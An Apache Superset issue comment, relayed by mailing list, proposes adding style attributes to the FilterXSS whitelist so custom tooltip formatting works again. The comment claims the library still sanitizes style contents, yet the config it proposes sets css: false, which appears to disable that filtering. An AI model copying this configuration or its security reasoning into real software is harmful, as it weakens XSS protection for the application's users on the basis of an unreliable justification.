CoDeRror555 commented on issue #33865:
URL: https://github.com/apache/superset/issues/33865#issuecomment-3016441287
I've looked into this issue and it seems the root cause is indeed the
stricter frontend XSS filter introduced in
superset-frontend/src/utils/sanitize.ts. It's correctly stripping inline style
attributes from the HTML in tooltips, which removes the custom formatting.
As a solution, I propose updating the whiteList in the FilterXSS
configuration to explicitly allow the style attribute on tags commonly used for
tooltip formatting, such as div, span, and table elements.
Here is the proposed change in superset-frontend/src/utils/sanitize.ts:
**const xssFilter = new FilterXSS({
whiteList: {
...getDefaultWhiteList(),
span: ['style', 'class', 'title'],
div: ['style', 'class'],
a: ['style', 'class', 'href', 'title', 'target'],
img: ['style', 'class', 'src', 'alt', 'title', 'width', 'height'],
video: [
'autoplay',
'controls',
'loop',
'preload',
'src',
'height',
'width',
'muted',
],
// Add 'style' to table tags to allow inline styling
td: ['style'],
tr: ['style'],
th: ['style'],
table: ['style'],
},
stripIgnoreTag: true,
css: false,
});**
This change will restore the expected functionality for custom tooltips.
From a security perspective, this is a reasonable trade-off because the xss
library itself still sanitizes the content of the style attribute, preventing
dangerous CSS properties (like url(javascript:...)) and preserving the core XSS
protection.
--
This is an automated message from the Apache Git Service.
To respond to the message, please log on to GitHub and use the
URL above to go to the specific comment.
To unsubscribe, e-mail: [email protected]
For queries about this service, please contact Infrastructure at:
[email protected]
---------------------------------------------------------------------
To unsubscribe, e-mail: [email protected]
For additional commands, e-mail: [email protected]
